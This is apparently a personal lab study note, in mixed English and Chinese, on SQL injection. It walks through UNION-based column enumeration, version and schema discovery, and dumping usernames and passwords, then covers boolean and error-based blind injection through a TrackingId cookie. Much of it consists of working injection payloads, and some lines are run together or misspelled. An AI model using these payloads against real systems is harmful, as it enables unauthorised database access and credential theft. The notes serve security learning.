SQLi
Ctrl+u : encode
’ 1=1–
PS:
After the ’ have a SPACE
But before “–”,have no SPACE
UNION-based SQL Injection
(1) Determine the number of columns
order by1✅正常 order by2✅正常 order by3❌报错 OR UNION SELECT NULL ❌报错 UNION SELECT NULL,NULL ✅正常 UNION SELECT NULL,NULL,NULL ❌报错(2) Determine the data types of the columns (must from a table),just know if it’s str
# Oracle must have the "FROM",so it's easy to use "FROM dual"UNION SELECT NULL,NULL FROM DUAL UNION SELECT'a',NULL FROM DUAL UNION SELECT NULL,'a'FROM DUAL UNION SELECT'a','a'FROM DUAL#if NULL,'a', you could:selectNULL,username||'~'||password fromusers(3) Output the version of the database
| 数据库 | 版本查询语句 |
|---|---|
| Oracle | SELECT banner FROM v$version |
| Oracle | SELECT version FROM v$instance |
| Microsoft | SELECT @@version |
| PostgreSQL | SELECT version() |
| MySQL | SELECT @@version |
# Must match the number of columnUNION SELECT banner, NULL fromv$version--# v$version store version info(4) Output TABLE NAME
USER_STATS
| 数据库 | 查询所有表 | 查询指定表的列 |
|---|---|---|
| Oracle | SELECT * FROM all_tables | SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE' |
| Microsoft | SELECT * FROM information_schema.tables | SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
| PostgreSQL | SELECT * FROM information_schema.tables | SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
| MySQL | SELECT * FROM information_schema.tables | SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
Google:information_schema.tables postgresql to find the “table_name”
SELECT*FROMinformation_schema.tablesUNIONSELECTtable_name,NULLFROMinformation_schema.tablesSearch to find the table: “users_vzoxvb”
(5) Output COLUMN NAME in table
Google:information_schema.columns postgresql to find “column_name” field
Search “Table_name” in Response,and use table_name replace the *
SELECT*FROMinformation_schema.columnsWHEREtable_name='TABLE-NAME-HERE'UNIONSELECTcolumns,NULLFROMinformation_schema.columnsWHEREtable_name='table_name' #Typethe users_vzoxvb intotable_namefieldUNIONSELECTcolumn_name,NULLFROMinformation_schema.columnsWHEREtable_name='users_vzoxvb'to Get “username_ggtjng” “password_ccixiu”
SELECT COLUMN_NAME FROM all_tab_columns WHERE table_name = ‘USERS_DTFKLB’
(6) Output Username and PWD
UNIONselectusername_ggtjng,password_ccixiu from users_vzoxvbto Rearch “Admin” or Normal User
Blind SQL Injection Response
Don’t like Union injection that show some data,blind always response “200”.
Time-based Blind SQLi could generate cmd which meet specific conditions to dalay the database.
(1)Confirm SQLi vulnerable
# use the trackingIdselecttracking-idfromtracking-tablewheretrackingId='RvLfBu6s9EZRlVYN'Cookie: TrackingId=jxuJ6305dQ35cEPz' and 1=1-- -> Welcome Cookie: TrackingId=jxuJ6305dQ35cEPz'and1=0-- -> No Welcome(2) Confirm that we have a users table
# If users table is exist,will output 'TestIfExist'SELECT'TestIfExist'FROMusers;# So we could test if the users is existingCookie: TrackingId=jxuJ6305dQ35cEPz' and (select 'x' from users LIMIT 1)='x'-- # Confitm the user name is "administrator" (SELECT 'a' FROM users WHERE username='administrator')='a' Cookie: TrackingId=jxuJ6305dQ35cEPz'and(SELECT'a'FROMusersWHEREusername='administrator')='a'--;(3)Determine PWD
Determine the length of PWD,Just use the Intruder
Cookie:TrackingId=jxuJ6305dQ35cEPz' and (SELECT 'a' FROM users WHERE username='administrator'AND LENGTH(password)>=20)='a'--;Then foreach the char
Cookie:TrackingId=jxuJ6305dQ35cEPz' and (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='e'--Blind SQL Injection Error
- Prove that parameter is vulnerable
||is to connect str,must use the''instead of""Cookie:TrackingId=hzd4cBI1UR0iMgKf'||(select '' from dual)||'- Confirm users table and administrator
# Determine the tableCookie: TrackingId=giUpOQnNBkR52ME7'||(select '' from users where rownum=1)||'# rowmun=1 is only to retrieve one line# Determine the adminitratorCookie: TrackingId=giUpOQnNBkR52ME7'||(select '' from users where username='adminitrator')||'(3)Determine the PWD
Cuz we can’t see the page that have right CMD,so we let the right CMD behavior ERROR,so we can judge the right CMD
# If 语句 is right ,we could find the ERROR to judge it is correct.'||(SELECT CASE WHEN (语句) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'# The Real Condition:# Determine Length : SELECT CASE WHEN (LENGTH(password)<10)Cookie: TrackingId=giUpOQnNBkR52ME7'||(SELECT CASE WHEN (LENGTH(password)>10) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'# Determine Char : Notify adminitrator and "AND" inside the "(..... AND substr(password,1,1)='a')"'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator' AND substr(password,1,1)='a')||'